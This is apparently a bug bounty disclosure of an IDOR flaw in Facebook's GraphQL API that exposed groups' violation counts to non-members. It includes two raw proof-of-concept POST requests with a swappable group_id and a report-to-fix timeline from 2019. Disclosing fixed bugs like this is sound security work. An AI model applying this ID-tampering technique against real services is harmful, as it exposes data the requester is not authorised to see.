[Facebook] Fetch Group Quality Insights

 This would have let any Facebook user to grab "Groups Quality insight' which shows the count of violated posts made in the group when he's a non admin or a non member. Regardless of Group Privacy settings.

POC -

A GraphQL request was vulnerable to IDOR -

==============================

POST/graphqlHTTP/1.1

doc_id=2424487570966507&method=post&locale=en_US&pretty=false&format=json&purpose=fetch&variables={"params":{"path":"/groups/violations/dashboard/","params":"{\"group_id\":XXX}","nt_context":{"using_white_navbar":true,"styles_id":"12a814e188c218e88139530938077622","pixel_ratio":1},"extra_client_data":{}},"nt_context":{"using_white_navbar":true,"styles_id":"12a814e188c218e88139530938077622","pixel_ratio":1},"scale":"1"}&fb_api_req_friendly_name=NativeTemplateScreenQuery&fb_api_caller_class=graphservice&fb_api_analytics_tags=["GraphServices"]&server_timestamps=true

================================

The "group_id" could be changed here. The response will be "200 OK" and additional info which would have shown the count of "Community Standard Violations 19 violations".

The same request was on the web UI -

================================

POST/api/graphql/ HTTP/1.1

Host:www.facebook.com

av=XXX&__user=XXX&__a=1&__dyn=&__csr=&__req=4u&__be=1&__pc=PHASED:DEFAULT&dpr=1&__rev=1001409913&__s=0u2bvl:0qp5ch:o5evq3&__hsi=6757574787531864103-0&fb_dtsg=AQGd-RfxJLW3:AQGRBiPo-nvy&jazoest=22067&__spin_r=1001409913&__spin_b=trunk&__spin_t=1573370487&fb_api_caller_class=RelayModern&fb_api_req_friendly_name=GroupsQualityCSViolationsRootContainerQuery&variables={"groupID":"XXX"}&doc_id=2061462663959034

================================

Timeline -

Reported - Sunday, November 3, 2019

Triaged - Friday, November 8, 2019 

Fixed - Tuesday, November 26, 2019 

Rewarded - Wednesday, November 27, 2019